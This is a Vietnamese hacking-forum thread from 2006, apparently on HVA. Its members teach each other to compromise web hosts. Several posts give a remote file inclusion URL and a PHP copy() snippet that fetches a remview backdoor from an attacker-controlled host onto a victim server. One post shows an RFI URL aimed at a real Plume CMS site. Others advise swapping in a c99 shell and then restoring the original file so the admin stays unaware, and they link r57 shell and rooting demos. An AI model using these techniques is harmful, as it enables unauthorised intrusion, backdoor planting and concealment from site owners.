[Question] Hack local |
28/06/2006 07:38:46 (+0700) | #31 | 1570 |
|
gamma95
Researcher
|
Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa">
Offline
|
|
nhócbmt đọc kĩ lại bài reply của luke ... "dùng hàm copy" |
|
Cánh chym không mỏi
lol |
|
|
|
[Question] Hack local |
28/06/2006 08:17:59 (+0700) | #32 | 1579 |
|
nhocbmt
Member
|
0 |
|
|
Joined: 26/06/2006 17:55:21
Messages: 75
Location: Ban Mê City
Offline
|
|
em vẫn ko hiểu lắm ? anh gamme giải thick dùm em hộ 1 tí được ko ???Dùng lệnh coppy của *nix thì làm được gì ???
Thx anh nhiều ! |
|
|
|
|
[Question] Hack local |
28/06/2006 08:42:04 (+0700) | #33 | 1582 |
|
gamma95
Researcher
|
Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa">
Offline
|
|
khổ wá ,copy làm 1 hàm của của PHP chứ không phải của *nix
đại loại là nếu 1 ứng dụng nào đó bị remote file include mà việc bạn include backdoor vào ko upload đc gì lên host victim ,thì bạn hãy include 1 file chứa hàm copy để copy con backdoor trên host của bạn về host của victim,tất nhiên folder của victim phải có quyền ghi
vd
http://site.com/index.php?file=http://host ko support php/hihi.php
nội dung file hihi.php
<?
copy("http://hostkosupportphp/remview.php","aboutme.php");
?>
lúc đó trên host của victim sẽ có con aboutme.php chính là con remview của chúng ta
căn bản là như thế |
|
Cánh chym không mỏi
lol |
|
|
|
[Question] Hack local |
28/06/2006 14:13:37 (+0700) | #34 | 1662 |
channhua
Elite Member
|
0 |
|
|
Joined: 18/07/2003 04:49:28
Messages: 338
Offline
|
|
khổ wá ,copy làm 1 hàm của của PHP chứ không phải của *nix
đại loại là nếu 1 ứng dụng nào đó bị remote file include mà việc bạn include backdoor vào ko upload đc gì lên host victim ,thì bạn hãy include 1 file chứa hàm copy để copy con backdoor trên host của bạn về host của victim,tất nhiên folder của victim phải có quyền ghi
vd
http://site.com/index.php?file=http://host ko support php/hihi.php
nội dung file hihi.php
<?
copy("http://hostkosupportphp/remview.php","aboutme.php");
?>
lúc đó trên host của victim sẽ có con aboutme.php chính là con remview của chúng ta
căn bản là như thế
bi giờ m mới hiểu
@luke: cái file 57.rar của bác unrar không đựoc, báo lỗi |
|
|
|
|
[Question] Hack local |
28/06/2006 21:43:12 (+0700) | #35 | 1725 |
buileminh
Member
|
0 |
|
|
Joined: 06/01/2004 01:09:02
Messages: 14
Location: 127.0.0.1
Offline
|
|
Nhưng bác cho em hỏi muốn include đươc kiểu này thì cái file index.php phải bị lỗi SQL Injection đúng ko? Nếu nó check input ($_GET['file']) cẩn thận thì ko thể include được đúng ko? |
|
|
|
|
[Question] Hack local |
29/06/2006 00:59:56 (+0700) | #36 | 1804 |
|
Luke
Elite Member
|
0 |
|
|
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
|
|
Nếu check input cần thận thì sẽ không tấn công theo kiều include được, hay còn gọi là RFI (Remote File Inclusion);
@channhua: Có người đã download về và chạy ngon
Đây là 1 đoạn video hướng dẫn tỷ mỉ cách khai thác local qua r57 và c99
Có lẽ để kết thúc các thắc mắc của các bác Luke up lên 2 đoạn video demo nữa
Demo for RFI technique: http://www.igates.net/plumeCms.rar
Demo for get Root: http://www.igates.net/root.rar
Tuy nhiên Luke cũng sẽ up lại file http://www.igates.net/r57.rar
Hy vọng mọi người cảm thấy có ích. Hic, nó dùng toàn tiếng Thổ Nhĩ Kỳ, xem hình chắc mọi người hiểu |
|
|
|
|
[Question] Re: Hack local |
29/06/2006 10:31:01 (+0700) | #37 | 1972 |
|
lonely_Xorhandsome
Elite Member
|
0 |
|
|
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
|
|
rất ...rất cảm ơn anh Dinhcaohack nhiều , em đã thử dùng c99 để hack thử forum kia chư`ng hơn 1 tháng rồi , nhưng cứ tưởng phải up vô host mới practise đuợc, nhờ anh bi giờ mới biết , quả thiệt trời cao
|
|
|
|
|
[Question] Hack local |
29/06/2006 12:18:00 (+0700) | #38 | 2015 |
|
lonely_Xorhandsome
Elite Member
|
0 |
|
|
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
|
|
gamma95 wrote:
khổ wá ,copy làm 1 hàm của của PHP chứ không phải của *nix
đại loại là nếu 1 ứng dụng nào đó bị remote file include mà việc bạn include backdoor vào ko upload đc gì lên host victim ,thì bạn hãy include 1 file chứa hàm copy để copy con backdoor trên host của bạn về host của victim,tất nhiên folder của victim phải có quyền ghi
vd
http://site.com/index.php?file=http://host ko support php/hihi.php
nội dung file hihi.php
<?
copy("http://hostkosupportphp/remview.php","aboutme.php");
?>
lúc đó trên host của victim sẽ có con aboutme.php chính là con remview của chúng ta
căn bản là như thế
Anh gamma ơi cho em hỏi , em viết hàm copy như anh nói để thử practise trong host của em , em cấp permission write public rồi mà nó còn báo lỗi thế này :
Code:
Warning:copy(http://freewebtown.com/tang05/fileremview)[function.copy]:failed to open stream:HTTP wrapper does not support writeable connections in /home/lonely/public_html/attacky.php on line 15
-em dùng 3 host cho mô hình này , 1 host không support chứa remview , host A chứa file attacky.php(em run bị lỗi trên), host B là destination , em dùng copy remview về 1 file php( em config write public ) ==> nhưng có lỗi như trên , mong anh chỉ giúp , cảm ơn anh nhiều !!! |
|
|
|
|
[Question] Hack local |
30/06/2006 00:20:41 (+0700) | #39 | 2161 |
|
dinhcaohack
Member
|
0 |
|
|
Joined: 22/04/2004 16:46:51
Messages: 41
Offline
|
|
Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix , cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra
Có 2 phương pháp nhanh ở việc này :
Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ
Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke) |
|
|
|
|
[Question] Hack local |
30/06/2006 00:29:21 (+0700) | #40 | 2163 |
kilua_vniss
Member
|
0 |
|
|
Joined: 26/06/2006 00:52:49
Messages: 16
Offline
|
|
find /path -perm 2 -ls
chú dch quên chưa nói cái nè để kiếm file cho ghi
cách kia cũng được mà , cái nè đơn giản hơn
mà cũng nên bít 1 ít về linux là hiểu thui mà |
|
|
|
|
[Question] Re: Hack local |
30/06/2006 04:17:32 (+0700) | #41 | 2233 |
hack2prison
Member
|
0 |
|
|
Joined: 10/02/2004 10:43:43
Messages: 58
Offline
|
|
nhocbmt wrote:
Code:
$ wget http://superb-east.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.6.3-pl1.tar.gz
Tải lên serv nặng quá dzậy lỡ bị timeout thì sao anh nhĩ ???
Sao ko tự viết 1 file php để select db nho nhỏ cần gì mà phải ôm luôn cái phpmyadmin kinh dzậy
R57shell có thể làm được tất cả công việc thay cho phpMyAdmin. Quan trọng là biết câu lệnh SQL |
|
|
|
|
[Question] Hack local |
30/06/2006 06:30:33 (+0700) | #42 | 2307 |
|
lonely_Xorhandsome
Elite Member
|
0 |
|
|
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
|
|
dinhcaohack wrote:
Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix , cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra
Có 2 phương pháp nhanh ở việc này :
Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ
Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke)
anh dinhcaohack ơi ! hồi wa em coi cái film demo của may thằng cha kia nó demo , thì thấy dùng hàm include thì chỉ có thể attack mấy cái host free dỏm hay sao a' Code:
http://bacaplume.free.fr/manager/frontinc/prepend.php?_PX_config[manager_path]=http://nhuy.hollosite.com/mshell.txt?
trang đó có mấy thằng turkey nó hack trước rồi , em cũng search theo từ khóa trong film "powered by plume CMS" nhưng không fải host nào cu~ng vô được !!! lâu lâu mới có cái được thôi a' , không biết "plume CMS" là 1 loai forum hay host của công ty nào đó cho thuê ??? theo kinh nghiệm của anh dinhcaohack thì cach dùng "include " để hack những host , huac forum bị lỗi thế nào hả anh ? cảm ơn anh nhiều nhiều lắ'm rất mong nhận được trả lời của anh . |
|
|
|
|
[Question] Re: Hack local |
30/06/2006 07:14:45 (+0700) | #43 | 2347 |
|
gamma95
Researcher
|
Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa">
Offline
|
|
Code:
Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix , cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra
Có 2 phương pháp nhanh ở việc này :
Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ
Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke)
hô hô ... bạn dch nói chiện nghe huề vốn wá ,vniss ngoài cái trò local ra còn cái fVck gì đâu mà múa lửa ,đi đâu cũng vờnit ,vờnit !
ps:điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng ! |
|
Cánh chym không mỏi
lol |
|
|
|
[Question] Hack local |
30/06/2006 08:27:59 (+0700) | #44 | 2367 |
|
dinhcaohack
Member
|
0 |
|
|
Joined: 22/04/2004 16:46:51
Messages: 41
Offline
|
|
điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng !
Riêng cái chuyện nói tục chửi bậy là không đủ .. tư cách rồi nhóc ạ
trang đó có mấy thằng turkey nó hack trước rồi , em cũng search theo từ khóa trong film "powered by plume CMS" nhưng không fải host nào cu~ng vô được !!! lâu lâu mới có cái được thôi a' , không biết "plume CMS" là 1 loai forum hay host của công ty nào đó cho thuê ??? theo kinh nghiệm của anh dinhcaohack thì cach dùng "include " để hack những host , huac forum bị lỗi thế nào hả anh ? cảm ơn anh nhiều nhiều lắ'm rất mong nhận được trả lời của anh .!
Anh chưa thử xem video , anh nghĩ chắc cái "plume CMS" dính lỗi include PHP, có thể em không thực hành được là vì bug ấy .. có lâu rồi em ạ, muốn thực hành thì tốt thôi .. cứ 0h30' em ghé qua milw0rm xem có bug PHP Remote Include thì thực hành :">
Còn cái "dùng "include " để hack" không phải như em nghĩ đâu , đây là cách nhúng shell vào 1 file PHP trên host victim , wa vờ nít đi em, anh ngại type bên này lắm |
|
|
|
|
[Question] Re: Hack local |
30/06/2006 08:36:26 (+0700) | #45 | 2370 |
|
lonely_Xorhandsome
Elite Member
|
0 |
|
|
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
|
|
gamma95 wrote:
Code:
Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix , cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra
Có 2 phương pháp nhanh ở việc này :
Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ
Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke)
hô hô ... bạn dch nói chiện nghe huề vốn wá ,vniss ngoài cái trò local ra còn cái fVck gì đâu mà múa lửa ,đi đâu cũng vờnit ,vờnit !
ps:điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng !
các anh ơi ! cho em xin na`o , em cu~ng biết VNIIS rồi có điều ở đây là topic về Hacklocal mà anh , thưc ra forum na`o thi` cũng thế cả , kĩ thuật hack ở viêtnam cũng đều dùng tools, và kĩ thuật của các hacker nước ngoài cả , có điều kĩ thuật nó từ người này qua người khác và phát triển thêm .. ..rất mong các anh tận tình hướng dẫn a ! còn dùng hack làm gì thì em nghĩ cũng là do ý thức của mỗi người cả ! em không có ý gì khác , chỉ mong các anh đoàn kết xây dựng HVA ngày càng mạnh . |
|
|
|
|
[Question] Hack local |
30/06/2006 08:41:09 (+0700) | #46 | 2373 |
|
lonely_Xorhandsome
Elite Member
|
0 |
|
|
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
|
|
dinhcaohack wrote:
điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng !
Riêng cái chuyện nói tục chửi bậy là không đủ .. tư cách rồi nhóc ạ
trang đó có mấy thằng turkey nó hack trước rồi , em cũng search theo từ khóa trong film "powered by plume CMS" nhưng không fải host nào cu~ng vô được !!! lâu lâu mới có cái được thôi a' , không biết "plume CMS" là 1 loai forum hay host của công ty nào đó cho thuê ??? theo kinh nghiệm của anh dinhcaohack thì cach dùng "include " để hack những host , huac forum bị lỗi thế nào hả anh ? cảm ơn anh nhiều nhiều lắ'm rất mong nhận được trả lời của anh .!
Anh chưa thử xem video , anh nghĩ chắc cái "plume CMS" dính lỗi include PHP, có thể em không thực hành được là vì bug ấy .. có lâu rồi em ạ, muốn thực hành thì tốt thôi .. cứ 0h30' em ghé qua milw0rm xem có bug PHP Remote Include thì thực hành :">
Còn cái "dùng "include " để hack" không phải như em nghĩ đâu , đây là cách nhúng shell vào 1 file PHP trên host victim , wa vờ nít đi em, anh ngại type bên này lắm
cảm ơn anh nhiều he'n , hồi đêm wa em cu~ng vào milw0rm , và dùng cai include đo'..đo' anh, em nhớ hình như là /exploits/1280 gì đó thì phải ...nhưng khi include rồi , em thưc hiện mấy cái lênh thì nó báo lỗi include(XXX) tùm lum cả , mà em cu~ng không hiểu cái file depend.php
nó viết cái gì cả , anh có thể chỉ giúp em không ạ ?
okis em thử wa vo*` nit thưc ra em là stand_alone bên đó , thanks anh nhiều ... |
|
|
|
|
[Question] Hack local |
30/06/2006 11:48:26 (+0700) | #47 | 2435 |
|
Luke
Elite Member
|
0 |
|
|
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
|
|
Anh chỉ nghĩ là, trước khi nghiên cứu về hacking nên trang bị cho mình đầy đủ các kiến thức căn bản đi đã.
Anh nghĩ em nên học một ngôn ngữ lập trình cho chắc đã. Bởi vì khi em nắm chắc, trong trường hợp này là PHP. Em sẽ ko cần phải hỏi han nhiều.
Mà bây giờ hỏi han chưa chắc em đã nắm được bản chất của vấn đề.
Topic này viết về Local Attack thì cũng ko nên quá đi xa về RFI, nếu muốn mọi người có thể mở 1 topic ra. Tránh việc để cho các bài viết HVA trở nên lộn xộn.
Cảm ơn. |
|
|
|
|
[Question] Hack local |
30/06/2006 14:26:15 (+0700) | #48 | 2468 |
|
lonely_Xorhandsome
Elite Member
|
0 |
|
|
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
|
|
Luke wrote:
Anh chỉ nghĩ là, trước khi nghiên cứu về hacking nên trang bị cho mình đầy đủ các kiến thức căn bản đi đã.
Anh nghĩ em nên học một ngôn ngữ lập trình cho chắc đã. Bởi vì khi em nắm chắc, trong trường hợp này là PHP. Em sẽ ko cần phải hỏi han nhiều.
Mà bây giờ hỏi han chưa chắc em đã nắm được bản chất của vấn đề.
Topic này viết về Local Attack thì cũng ko nên quá đi xa về RFI, nếu muốn mọi người có thể mở 1 topic ra. Tránh việc để cho các bài viết HVA trở nên lộn xộn.
Cảm ơn.
cảm ơn về ý kiến của anh , em cũng đã & đang tự học php qua ebook , nhưng chỉ ở mức thao tác với database và lấy 1 số thông tin phía người dùng , còn network em cũng đã hoc qua các course MCSA , với topic mà anh đưa ra em thấy rất thú vị đó chứ ! em đã thử dùng attack theo kiểu include ngay sau khi tham gia topic này nhưng chỉ áp dụng được cho 1 số host em tìm theo "plume CMS" ,nhưng không thực hiện được lênh shell ???, còn theo cách copy từ remview từ 1 host như các anh hướng dẫn ,em cũng đã thử nhưng cách này chưa thành công (em cũng dùng qua het r57,c99,remview nhưng không nhớ tên chỉ biết nó là backdoor ) ...qua topic này em muốn tìm hiểu rõ hơn rất mong các anh hướng dẫn nũa ạ |
|
|
|
|
[Question] Hack local |
01/07/2006 23:11:42 (+0700) | #49 | 2869 |
thelast
Member
|
0 |
|
|
Joined: 26/06/2006 20:44:31
Messages: 2
Offline
|
|
Designed: Le Nhat Nam - Security checked: xLuke & Hacked by quocboy |
|
|
[Question] Hack local |
02/07/2006 02:17:29 (+0700) | #50 | 2939 |
|
lonely_Xorhandsome
Elite Member
|
0 |
|
|
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
|
|
[Question] Hack local |
02/07/2006 09:11:22 (+0700) | #51 | 3063 |
thelast
Member
|
0 |
|
|
Joined: 26/06/2006 20:44:31
Messages: 2
Offline
|
|
Nói làm gì cái thằng ba bứa đó , nó ăn cháo đá bát là tài .... |
|
|
[Question] Hack local |
02/07/2006 09:18:43 (+0700) | #52 | 3066 |
|
xnohat
Moderator
|
Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
|
|
Rõ hay nhỉ chỗ HVA là để khoe chiến tích hay sao mà mang ra đây khoe thế hả
Mấy cụ bên BQT sao lại sơ xuất thế này |
|
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline |
|
|